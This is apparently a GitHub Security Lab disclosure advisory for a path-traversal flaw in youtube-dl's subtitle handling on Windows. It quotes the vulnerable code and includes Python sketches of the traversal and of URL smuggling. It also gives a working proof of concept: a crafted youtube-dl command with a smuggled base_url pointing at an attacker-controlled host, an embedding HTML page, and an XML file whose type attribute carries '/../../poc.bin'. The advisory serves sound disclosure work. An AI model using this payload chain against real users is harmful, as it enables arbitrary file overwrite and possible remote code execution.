Coordinated Disclosure Timeline

Summary

youtube-dl doesn’t validate the subtitle extension name, which makes its Windows users vulnerable to path traversal and allows for arbitrary binary file overwrite when downloading a video with subtitles from a crafted link.

Project

youtube-dl

Tested Version

The nightly v2024.05.16 and the last official v2021.12.17.

Details

Path traversal saving subtitles (GHSL-2024-089)

youtube-dl can download not only video files but also the accompanying subtitles when the user specifies the --write-sub, --write-auto-sub, or --all-subs option. Each supported video website has a dedicated extractor. Some extractors provide only the URLs of subtitles, and youtube-dl resolves the extension from the URL path. Others provide both the URLs and the subtitle extensions explicitly. Of the latter, some validate the extracted subtitle extension, but others trust the extracted value blindly.

youtube-dl honors the provided extension and uses it to build the name of the subtitle output file in [1]. Here filename is the generated name of the video file, sub_lang is en by default, sub_format is the extracted subtitle extension, and info_dict.get('ext') is the video file extension that subtitles_filename replaces with sub_format. The subtitle is written as a binary file in [2]. encodeFilename is just a wrapper for Unicode support that does nothing in Python 3.

If the user doesn’t override the default output template %(title)s-%(id)s.%(ext)s, sub_filename is formatted as %(title)s-%(id)s.%(sub_lang)s.%(sub_format)s. A path traversal sequence injected into sub_format doesn’t work on Linux, because Linux rejects paths such as not_existing_folder/../../file whose intermediate directory does not exist. It does work on Windows, which collapses the .. segments before looking the path up.

        if subtitles_are_requested and info_dict.get('requested_subtitles'):
            # subtitles download errors are already managed as troubles in relevant IE
            # that way it will silently go on when used with unsupporting IE
            subtitles = info_dict['requested_subtitles']
            ie = self.get_info_extractor(info_dict['extractor_key'])
            for sub_lang, sub_info in subtitles.items():
                sub_format = sub_info['ext']
                sub_filename = subtitles_filename(filename, sub_lang, sub_format, info_dict.get('ext')) # <------------- [1]
                if self.params.get('nooverwrites', False) and os.path.exists(encodeFilename(sub_filename)):
                    self.to_screen('[info] Video subtitle %s.%s is already present' % (sub_lang, sub_format))
                else:
                    self.to_screen('[info] Writing video subtitles to: ' + sub_filename)
                    if sub_info.get('data') is not None:
#...
                    else:
                        try:
                            sub_data = ie._request_webpage(
                                sub_info['url'], info_dict['id'], note=False).read()
                            with open(encodeFilename(sub_filename), 'wb') as subfile: # <------------- [2]
                                subfile.write(sub_data)
                        except (ExtractorError, IOError, OSError, ValueError) as err:
                            self.report_warning('Unable to download subtitle for "%s": %s' %
                                                (sub_lang, error_to_compat_str(err)))
                            continue
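
The effect of an unvalidated sub_format on the resulting path can be illustrated with a minimal sketch. The build_sub_filename helper below is a simplified, hypothetical stand-in for subtitles_filename (it is not the project's code), the video filename is made up, and ntpath.normpath is used only to approximate how Windows collapses .. segments, so the snippet behaves the same on any platform.

```python
import ntpath
import os.path


def build_sub_filename(filename, sub_lang, sub_format, expected_real_ext=None):
    """Hypothetical simplification of subtitles_filename: swap the video
    extension for '<sub_lang>.<sub_format>' without validating sub_format."""
    name, real_ext = os.path.splitext(filename)
    if expected_real_ext and real_ext[1:] != expected_real_ext:
        name = filename  # unexpected extension: append instead of replacing
    return '%s.%s.%s' % (name, sub_lang, sub_format)


video = 'Introduction-gfVXISmEB_6804984382.mp4'  # made-up video filename
benign = build_sub_filename(video, 'en', 'vtt', 'mp4')
crafted = build_sub_filename(video, 'en', '/../../poc.bin', 'mp4')

print(benign)
print(crafted)
# Lexical normalization with Windows path rules: the first '..' cancels the
# bogus '<title>-<id>.en.' component, the second one leaves the directory.
print(ntpath.normpath(crafted))
```

In this sketch the normalized path points one directory above the download directory, even though no folder named after the video ever exists.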

Exploitability and Proof of Concept (PoC)

Intentionally crafted subtitle extension names served by a supported website (such as youtube.com or bbc.co.uk) are not in the threat model of this report. However, such a website may be compromised at some point: an XSS or SQL injection would allow an attacker to exploit a specific youtube-dl extractor. The attacker would then need to wait for any youtube-dl user, or trick a specific one, to download the video with subtitles. Other youtube-dl features, however, allow exploitation without compromising the video hosting website:

  1. URL smuggling. Some youtube-dl extractors attempt to get additional information from the part of the URL that comes after #, the fragment. The fragment is URL-decoded and parsed as JSON. The extractor for Microsoft Virtual Academy, for example, parses the fragment [1], retrieves base_url from it [2], and then downloads an XML file from that URL [3]. The subtitle extension is extracted from the XML file. If a user is tricked into running, for example, youtube-dl --write-sub https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2Fsite.com%22%7D it will use an XML file from an attacker-controlled site, site.com in this case, to extract subtitles and video files.
         url, smuggled_data = unsmuggle_url(url, {})  # <------------- [1]

         mobj = re.match(self._VALID_URL, url)
         course_id = mobj.group('course_id')
         video_id = mobj.group('id')

         base_url = smuggled_data.get('base_url') or self._extract_base_url(course_id, video_id)  # <------------- [2]

         settings = self._download_xml(
             '%s/content/content_%s/videosettings.xml?v=1' % (base_url, video_id),  # <------------- [3]
             video_id, 'Downloading video settings XML')
    
  2. Generic extractor. youtube-dl allows you to download videos from arbitrary pages that embed supported video websites. This allows the attacker to hide the smuggled fragment from a youtube-dl user. The user needs to run only youtube-dl --write-sub https://attacker.com/poc.html
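
The fragment format used in the command above can be reproduced with the standard library. The following is a minimal sketch of the encoding and decoding steps, not youtube-dl's own implementation: the smuggle and unsmuggle helpers and the SMUGGLE_KEY constant are hypothetical names chosen for illustration.

```python
import json
from urllib.parse import parse_qs, urlencode

SMUGGLE_KEY = '__youtubedl_smuggle'  # fragment key seen in the crafted URL


def smuggle(url, data):
    """Append JSON data to the URL fragment (sketch of the encoding side)."""
    return url + '#' + urlencode({SMUGGLE_KEY: json.dumps(data)})


def unsmuggle(smuggled_url, default=None):
    """Split off the fragment and decode the JSON payload, if present."""
    if '#' + SMUGGLE_KEY not in smuggled_url:
        return smuggled_url, default
    url, _, fragment = smuggled_url.rpartition('#')
    payload = parse_qs(fragment)[SMUGGLE_KEY][0]
    return url, json.loads(payload)


page = ('https://mva.microsoft.com/en-US/training-courses/'
        'microsoft-azure-fundamentals-virtual-machines-11788'
        '?l=gfVXISmEB_6804984382')
crafted = smuggle(page, {'base_url': 'http://site.com'})
url, smuggled_data = unsmuggle(crafted, {})

print(crafted)
print(smuggled_data.get('base_url'))
```

Because the payload travels in the fragment, anyone who can get a URL in front of the user (directly or through an embedding page) controls base_url in this sketch.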

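For a PoC, an HTML page embeds the smuggled URL (first line below), and the server named in base_url answers the videosettings.xml request with the XML that follows. The type attribute of MarkerResourceSource carries the path traversal payload: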

<class="embedly-card" href="https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2F127.0.0.1%3A8000%22%7D">
<videoSettings version="1.5">
  <PlaylistItems>
    <PlaylistItem>
      <MediaSources videoType="progressive"><MediaSource videoMode="720p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="true">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_high.mp4</MediaSource><MediaSource videoMode="540p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_mid.mp4</MediaSource><MediaSource videoMode="360p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">https://sec.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01.mp4</MediaSource></MediaSources>
      <MediaSource />
      <Title>01 | Introduction</Title>
      <MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
      <ThumbSource />
    </PlaylistItem>
  </PlaylistItems>
</videoSettings>
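
To make the data flow concrete, the sketch below parses a trimmed copy of the XML above and reads the type attribute, assuming (as the PoC suggests) that the extractor uses that attribute as the subtitle extension. The looks_like_plain_extension check is a hypothetical illustration of the kind of validation that is missing; it is not taken from youtube-dl.

```python
import re
import xml.etree.ElementTree as ET

# Trimmed copy of the PoC settings file; only the relevant elements are kept.
SETTINGS_XML = """
<videoSettings version="1.5">
  <PlaylistItems>
    <PlaylistItem>
      <Title>01 | Introduction</Title>
      <MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
    </PlaylistItem>
  </PlaylistItems>
</videoSettings>
"""


def looks_like_plain_extension(ext):
    """Hypothetical check: accept only short alphanumeric extensions."""
    return re.fullmatch(r'[A-Za-z0-9]{1,8}', ext) is not None


root = ET.fromstring(SETTINGS_XML.strip())
# Collect (extension, relative subtitle path) pairs from the settings file.
sources = [(src.get('type'), src.text)
           for src in root.iter('MarkerResourceSource')]

for ext, path in sources:
    verdict = 'ok' if looks_like_plain_extension(ext) else 'rejected'
    print('%s -> %s (%s)' % (path, ext, verdict))
```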

Impact

This issue may lead to unauthorized file system modification and, if an executable file is overwritten, to remote code execution.

CVE

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2024-089 in any communication regarding this issue.